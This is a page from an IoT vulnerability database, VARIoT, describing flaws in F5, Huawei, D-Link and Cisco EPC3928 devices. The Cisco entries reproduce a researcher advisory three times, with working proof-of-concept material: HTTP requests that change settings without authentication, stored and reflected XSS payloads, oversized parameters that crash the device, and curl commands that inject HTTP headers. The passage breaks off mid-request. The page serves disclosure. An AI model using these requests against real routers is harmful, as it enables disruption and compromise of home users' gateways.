VARIoT IoT vulnerabilities database
VAR-201606-0030 | CVE-2016-5020 | F5 BIG-IP In Resource Administration Vulnerability in changing account settings for role users |
CVSS V2: 9.0 CVSS V3: 8.8 Severity: HIGH |
F5 BIG-IP before 12.0.0 HF3 allows remote authenticated users to modify the account configuration of users with the Resource Administration role and gain privilege via a crafted external Extended Application Verification (EAV) monitor script. Multiple F5 BIG-IP Products are prone to a privilege-escalation vulnerability.
An attacker can exploit this issue to gain elevated privileges and perform unauthorized actions. F5 BIG-IP LTM, etc. LTM is a local traffic manager; GTM is a wide area traffic manager; WebAccelerator is an application accelerator. The following products and versions are affected: F5 BIG-IP LTM, ASM, Link Controller version 12.0.0, version 11.4.0 to version 11.6.1, version 11.2.1, version 10.2.1 to version 10.2.4, AAM 12.0. 0 to 12.1.0, 11.4.0 to 11.6.1, AFM, PEM 12.0.0, 11.4.0 to 11.6.1, Analytics 12.0.0, 11.4.0 to 11.6.1 Versions, 11.2.1, DNS 12.0.0, Edge Gateway, WebAccelerator, WOM 11.2.1, 10.2.1 to 10.2.4, GTM 11.4.0 to 11.6.1, 11.2.1, Version 10.2.1 to version 10.2.4
VAR-201606-0459 | CVE-2016-5368 | Huawei AR3200 Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
Memory leak in Huawei AR3200 before V200R007C00SPC900 allows remote attackers to cause a denial of service (memory consumption) via a large number of crafted Multiprotocol Label Switching (MPLS) packets. Huawei AR3200 is an AR3200 series enterprise router product from China Huawei. The HuaweiAR3200 handles MPLS packets with a memory leak vulnerability. Huawei AR3200 router is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to cause a denial-of-service condition, denying service to legitimate users.
This issue is fixed in:
Huawei AR3200 router version V200R007C00SPC900. The following versions are affected: Huawei AR3200 V200R007C00, V200R005C32, and V200R005C20
VAR-201606-0544 | No CVE | D-Link DCS-930L Camera Command Injection Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
D-Link DCS-930L is a wireless surveillance camera from D-Link.
Command injection vulnerability exists in D-Link DCS-930L Camera. An attacker could use this vulnerability to execute arbitrary commands in the context of an affected device
VAR-201607-0003 | CVE-2016-1328 | Cisco EPC3928 Device goform/WClientMACList Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
goform/WClientMACList on Cisco EPC3928 devices allows remote attackers to cause a denial of service (device crash) via a long h_sortWireless parameter, related to a "Gateway Client List Denial of Service" issue, aka Bug ID CSCux24948. The CiscoEPC3928 is a wireless router product from Cisco. A security vulnerability exists in the goform/WClientMACList on the Cisco EPC3928. Cisco Model EPC3928 Wireless Residential Gateway is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to cause a denial-of-service condition.
This issue being tracked by Cisco Bug ID CSCux24948. Variants of this product can also be affected.
Using combination of several vulnerabilities, attacker is able to remotely download and decode boot configuration file, which you can see on PoC video below. The attacker is also able to reconfigure device in order to perform attacks on the home-user, inject additional data to modem http response or extract sensitive informations from the device, such as the Wi-Fi key.
Until Cisco releases workarounds or patches, we recommend verify access to the web-based management panel and make sure that it is not reachable from the external network.
Vulnerabilities:
1) Unauthorized Command Execution
2) Gateway Stored XSS
3) Gateway Client List DoS
4) Gateway Reflective XSS
5) Gateway HTTP Corruption DoS
6) "Stored" HTTP Response Injection
7) Boot Information Disclosure
========
PoC:
- Unathorized Command Execution
#1 - Channel selection request:
POST /goform/ChannelsSelection HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/ChannelsSelection.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
SAHappyUpstreamChannel=3
#1 - Response:
HTTP/1.0 200 OK
Server: PS HTTP Server
Content-type: text/html
Connection: close
<html lang="en"><head><title>RELOAD</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><script language="javascript" type="text/javascript" src="../active.js"></script><script language="javascript" type="text/javascript" src="../lang.js"></script><script language="javascript" type="text/javascript">var totaltime=120;function time(){document.formnow.hh.value=(" "+totaltime+" Seconds ");totaltime--;} function refreshStatus(){window.setTimeout("window.parent.location.href='http://192.168.1.1'",totaltime*1000);}mytime=setInterval('time()',1000);</script></head><body BGCOLOR="#CCCCCC" TEXT=black><form name="formnow"><HR><h1><script language="javascript" type="text/javascript">dw(msg_goform34);</script><a href="http://192.168.1.1/index.asp"><script language="javascript" type="text/javascript">dw(msg_goform35);</script></a><script language="javascript">refreshStatus();</script><input type="text" name="hh" style="background-color:#CCCCCC;font-size:36;border:n
one"></h1></form></body></html>
#2 - Clear logs request:
POST /goform/Docsis_log HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Docsis_log.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
BtnClearLog=Clear+Log&SnmpClearEventLog=0
#2 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.1.1/Docsis_log.asp
Content-type: text/html
Connection: close
- Gateway Stored and Reflective Cross Site Scripting
Example #1:
#1 \x96 Stored XSS via username change request:
POST /goform/Administration HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Administration.asp
Cookie: Lang=en; SessionID=2719880
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
working_mode=0&sysname=<script>alert('XSS')</script>&sysPasswd=home&sysConfirmPasswd=home&save=Save+Settings&preWorkingMode=1&h_wlan_enable=enable&h_user_type=common
#1 \x96 Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.1.1/Administration.asp
Content-type: text/html
Connection: close
#2 \x96 Redirect request:
GET /Administration.asp HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Administration.asp
Cookie: Lang=en; SessionID=2719880
DNT: 1
Connection: keep-alive
#2 \x96 Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 15832
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
(...)
<tr>
<td>
<script language="javascript" type="text/javascript">dw(usertype);</script>
</td>
<td nowrap>
<script>alert('XSS')</script>
</TD>
</tr>
<tr>
(...)
Example #2:
#1 \x96 Reflected XSS via client list request:
POST /goform/WClientMACList HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: 192.168.1.1/WClientMACList.asp
Cookie: Lang=en; SessionID=109660
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
sortWireless=mac&h_sortWireless=mac" onmouseover=alert(1) x="y
#1 \x96 Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: 192.168.1.1/WClientMACList.asp
Content-type: text/html
Connection: close
#2 \x96 Redirect request:
GET /WClientMACList.asp HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: 192.168.1.1/WClientMACList.asp
Cookie: Lang=en; SessionID=109660
Connection: keep-alive
#2 \x96 Reponse:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 7385
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
(...)
</table>
</div>
<input type="hidden" name="h_sortWireless" value="mac" onmouseover=alert(1) x="y" />
</form>
</body>
</html>
(...)
- Gateway Client List Denial of Service
Device will crash after sending following request.
# HTTP Request
POST /goform/WClientMACList HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/WClientMACList.asp
Cookie: Lang=en; SessionID=109660
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
sortWireless=mac&h_sortWireless=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
- Gateway HTTP Corruption Denial of Service
Device will crash after sending following request.
# HTTP Request
POST /goform/Docsis_system HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Docsis_system.asp
Cookie: Lang=en; SessionID=348080
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 106
username_login=&password_login=&LanguageSelect=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&Language_Submit=0&login=Log+In
- "Stored" HTTP Response Injection
It is able to inject additional HTTP data to response, if string parameter of LanguageSelect won't be too long (in that case device will crash).
Additional data will be stored in device memory and returned with every http response on port 80 until reboot.
devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 1469
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
devil@hell:~$ curl --data "username_login=&password_login=&LanguageSelect=en%0d%0aSet-Cookie: w00t&Language_Submit=0&login=Log+In" http://192.168.1.1/goform/Docsis_system -s > /dev/null
devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Set-Cookie: Lang=en
Set-Cookie: w00t
Set-Cookie: SessionID=657670
Content-Length: 1469
- Boot Information Disclosure
In early booting phase, for a short period of time some administrator functions can be executed, and it is able to extract device configuration file. We wrote an exploit that crash the modem, and then retrieve and decode config in order to obtain users credentials.
Exploit video PoC: https://www.youtube.com/watch?v=PHSx0s7Turo
========
CVE References:
CVE-2015-6401
CVE-2015-6402
CVE-2016-1328
CVE-2016-1336
CVE-2016-1337
Cisco Bug ID\x92s:
CSCux24935
CSCux24938
CSCux24941
CSCux24948
CSCuy28100
CSCux17178
Read more on our blog:
http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/
VAR-201607-0004 | CVE-2016-1336 | Cisco EPC3928 Denial of Service Vulnerability |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
goform/Docsis_system on Cisco EPC3928 devices allows remote attackers to cause a denial of service (device crash) via a long LanguageSelect parameter, related to a "Gateway HTTP Corruption Denial of Service" issue, aka Bug ID CSCuy28100. The CiscoEPC3928 is a wireless router product from Cisco. A security vulnerability exists in goform/Docsis_system on the Cisco EPC3928. Cisco Wireless Residential Gateway is prone to a denial-of-service vulnerability.
This issue is being tracked by Cisco Bug ID CSCuy28100. # Title: Cisco EPC 3928 Multiple Vulnerabilities
# Vendor: http://www.cisco.com/
# Vulnerable Version(s): Cisco Model EPC3928 DOCSIS 3.0 8x4 Wireless Residential Gateway
# CVE References: CVE-2015-6401 / CVE-2015-6402 / CVE-2016-1328 / CVE-2016-1336 / CVE-2016-1337
# Author: Patryk Bogdan from Secorda security team (http://secorda.com/)
========
Summary:
In recent security research, Secorda security team has found multiple vulnerabilities affecting Cisco EPC3928 Wireless Residential Gateway. Variants of this product can also be affected.
Using combination of several vulnerabilities, attacker is able to remotely download and decode boot configuration file, which you can see on PoC video below. The attacker is also able to reconfigure device in order to perform attacks on the home-user, inject additional data to modem http response or extract sensitive informations from the device, such as the Wi-Fi key.
Until Cisco releases workarounds or patches, we recommend verify access to the web-based management panel and make sure that it is not reachable from the external network.
Vulnerabilities:
1) Unauthorized Command Execution
2) Gateway Stored XSS
3) Gateway Client List DoS
4) Gateway Reflective XSS
5) Gateway HTTP Corruption DoS
6) "Stored" HTTP Response Injection
7) Boot Information Disclosure
========
PoC:
- Unathorized Command Execution
#1 - Channel selection request:
POST /goform/ChannelsSelection HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/ChannelsSelection.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
SAHappyUpstreamChannel=3
#1 - Response:
HTTP/1.0 200 OK
Server: PS HTTP Server
Content-type: text/html
Connection: close
<html lang="en"><head><title>RELOAD</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><script language="javascript" type="text/javascript" src="../active.js"></script><script language="javascript" type="text/javascript" src="../lang.js"></script><script language="javascript" type="text/javascript">var totaltime=120;function time(){document.formnow.hh.value=(" "+totaltime+" Seconds ");totaltime--;} function refreshStatus(){window.setTimeout("window.parent.location.href='http://192.168.1.1'",totaltime*1000);}mytime=setInterval('time()',1000);</script></head><body BGCOLOR="#CCCCCC" TEXT=black><form name="formnow"><HR><h1><script language="javascript" type="text/javascript">dw(msg_goform34);</script><a href="http://192.168.1.1/index.asp"><script language="javascript" type="text/javascript">dw(msg_goform35);</script></a><script language="javascript">refreshStatus();</script><input type="text" name="hh" style="background-color:#CCCCCC;font-size:36;border:n
one"></h1></form></body></html>
#2 - Clear logs request:
POST /goform/Docsis_log HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Docsis_log.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
BtnClearLog=Clear+Log&SnmpClearEventLog=0
#2 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.1.1/Docsis_log.asp
Content-type: text/html
Connection: close
- Gateway Stored and Reflective Cross Site Scripting
Example #1:
#1 \x96 Stored XSS via username change request:
POST /goform/Administration HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Administration.asp
Cookie: Lang=en; SessionID=2719880
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
working_mode=0&sysname=<script>alert('XSS')</script>&sysPasswd=home&sysConfirmPasswd=home&save=Save+Settings&preWorkingMode=1&h_wlan_enable=enable&h_user_type=common
#1 \x96 Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.1.1/Administration.asp
Content-type: text/html
Connection: close
#2 \x96 Redirect request:
GET /Administration.asp HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Administration.asp
Cookie: Lang=en; SessionID=2719880
DNT: 1
Connection: keep-alive
#2 \x96 Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 15832
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
(...)
<tr>
<td>
<script language="javascript" type="text/javascript">dw(usertype);</script>
</td>
<td nowrap>
<script>alert('XSS')</script>
</TD>
</tr>
<tr>
(...)
Example #2:
#1 \x96 Reflected XSS via client list request:
POST /goform/WClientMACList HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: 192.168.1.1/WClientMACList.asp
Cookie: Lang=en; SessionID=109660
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
sortWireless=mac&h_sortWireless=mac" onmouseover=alert(1) x="y
#1 \x96 Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: 192.168.1.1/WClientMACList.asp
Content-type: text/html
Connection: close
#2 \x96 Redirect request:
GET /WClientMACList.asp HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: 192.168.1.1/WClientMACList.asp
Cookie: Lang=en; SessionID=109660
Connection: keep-alive
#2 \x96 Reponse:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 7385
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
(...)
</table>
</div>
<input type="hidden" name="h_sortWireless" value="mac" onmouseover=alert(1) x="y" />
</form>
</body>
</html>
(...)
- Gateway Client List Denial of Service
Device will crash after sending following request.
# HTTP Request
POST /goform/WClientMACList HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/WClientMACList.asp
Cookie: Lang=en; SessionID=109660
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
sortWireless=mac&h_sortWireless=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
- Gateway HTTP Corruption Denial of Service
Device will crash after sending following request.
# HTTP Request
POST /goform/Docsis_system HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Docsis_system.asp
Cookie: Lang=en; SessionID=348080
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 106
username_login=&password_login=&LanguageSelect=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&Language_Submit=0&login=Log+In
- "Stored" HTTP Response Injection
It is able to inject additional HTTP data to response, if string parameter of LanguageSelect won't be too long (in that case device will crash).
Additional data will be stored in device memory and returned with every http response on port 80 until reboot.
devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 1469
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
devil@hell:~$ curl --data "username_login=&password_login=&LanguageSelect=en%0d%0aSet-Cookie: w00t&Language_Submit=0&login=Log+In" http://192.168.1.1/goform/Docsis_system -s > /dev/null
devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Set-Cookie: Lang=en
Set-Cookie: w00t
Set-Cookie: SessionID=657670
Content-Length: 1469
- Boot Information Disclosure
In early booting phase, for a short period of time some administrator functions can be executed, and it is able to extract device configuration file. We wrote an exploit that crash the modem, and then retrieve and decode config in order to obtain users credentials.
Exploit video PoC: https://www.youtube.com/watch?v=PHSx0s7Turo
========
CVE References:
CVE-2015-6401
CVE-2015-6402
CVE-2016-1328
CVE-2016-1336
CVE-2016-1337
Cisco Bug ID\x92s:
CSCux24935
CSCux24938
CSCux24941
CSCux24948
CSCuy28100
CSCux17178
Read more on our blog:
http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/
VAR-201607-0005 | CVE-2016-1337 | Cisco EPC3928 Vulnerability in obtaining critical settings and credentials on devices |
CVSS V2: 4.3 CVSS V3: 8.1 Severity: HIGH |
Cisco EPC3928 devices allow remote attackers to obtain sensitive configuration and credential information by making requests during the early part of the boot process, related to a "Boot Information Disclosure" issue, aka Bug ID CSCux17178. The CiscoEPC3928 is a wireless router product from Cisco. A security vulnerability exists in CiscoEPC3928.
This issue is being tracked by Cisco Bug ID CSCux17178. Variants of this product can also be affected.
Using combination of several vulnerabilities, attacker is able to remotely download and decode boot configuration file, which you can see on PoC video below. The attacker is also able to reconfigure device in order to perform attacks on the home-user, inject additional data to modem http response or extract sensitive informations from the device, such as the Wi-Fi key.
Until Cisco releases workarounds or patches, we recommend verify access to the web-based management panel and make sure that it is not reachable from the external network.
Vulnerabilities:
1) Unauthorized Command Execution
2) Gateway Stored XSS
3) Gateway Client List DoS
4) Gateway Reflective XSS
5) Gateway HTTP Corruption DoS
6) "Stored" HTTP Response Injection
7) Boot Information Disclosure
========
PoC:
- Unathorized Command Execution
#1 - Channel selection request:
POST /goform/ChannelsSelection HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/ChannelsSelection.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
SAHappyUpstreamChannel=3
#1 - Response:
HTTP/1.0 200 OK
Server: PS HTTP Server
Content-type: text/html
Connection: close
<html lang="en"><head><title>RELOAD</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><script language="javascript" type="text/javascript" src="../active.js"></script><script language="javascript" type="text/javascript" src="../lang.js"></script><script language="javascript" type="text/javascript">var totaltime=120;function time(){document.formnow.hh.value=(" "+totaltime+" Seconds ");totaltime--;} function refreshStatus(){window.setTimeout("window.parent.location.href='http://192.168.1.1'",totaltime*1000);}mytime=setInterval('time()',1000);</script></head><body BGCOLOR="#CCCCCC" TEXT=black><form name="formnow"><HR><h1><script language="javascript" type="text/javascript">dw(msg_goform34);</script><a href="http://192.168.1.1/index.asp"><script language="javascript" type="text/javascript">dw(msg_goform35);</script></a><script language="javascript">refreshStatus();</script><input type="text" name="hh" style="background-color:#CCCCCC;font-size:36;border:n
one"></h1></form></body></html>
#2 - Clear logs request:
POST /goform/Docsis_log HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Docsis_log.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
BtnClearLog=Clear+Log&SnmpClearEventLog=0
#2 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.1.1/Docsis_log.asp
Content-type: text/html
Connection: close
- Gateway Stored and Reflective Cross Site Scripting
Example #1:
#1 \x96 Stored XSS via username change request:
POST /goform/Administration HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Administration.asp
Cookie: Lang=en; SessionID=2719880
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
working_mode=0&sysname=<script>alert('XSS')</script>&sysPasswd=home&sysConfirmPasswd=home&save=Save+Settings&preWorkingMode=1&h_wlan_enable=enable&h_user_type=common
#1 \x96 Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.1.1/Administration.asp
Content-type: text/html
Connection: close
#2 \x96 Redirect request:
GET /Administration.asp HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Administration.asp
Cookie: Lang=en; SessionID=2719880
DNT: 1
Connection: keep-alive
#2 \x96 Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 15832
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
(...)
<tr>
<td>
<script language="javascript" type="text/javascript">dw(usertype);</script>
</td>
<td nowrap>
<script>alert('XSS')</script>
</TD>
</tr>
<tr>
(...)
Example #2:
#1 \x96 Reflected XSS via client list request:
POST /goform/WClientMACList HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: 192.168.1.1/WClientMACList.asp
Cookie: Lang=en; SessionID=109660
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
sortWireless=mac&h_sortWireless=mac" onmouseover=alert(1) x="y
#1 \x96 Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: 192.168.1.1/WClientMACList.asp
Content-type: text/html
Connection: close
#2 \x96 Redirect request:
GET /WClientMACList.asp HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: 192.168.1.1/WClientMACList.asp
Cookie: Lang=en; SessionID=109660
Connection: keep-alive
#2 \x96 Reponse:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 7385
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
(...)
</table>
</div>
<input type="hidden" name="h_sortWireless" value="mac" onmouseover=alert(1) x="y" />
</form>
</body>
</html>
(...)
- Gateway Client List Denial of Service
Device will crash after sending following request.
# HTTP Request
POST /goform/WClientMACList HTTP/1.1
Host: 192.168.1.1
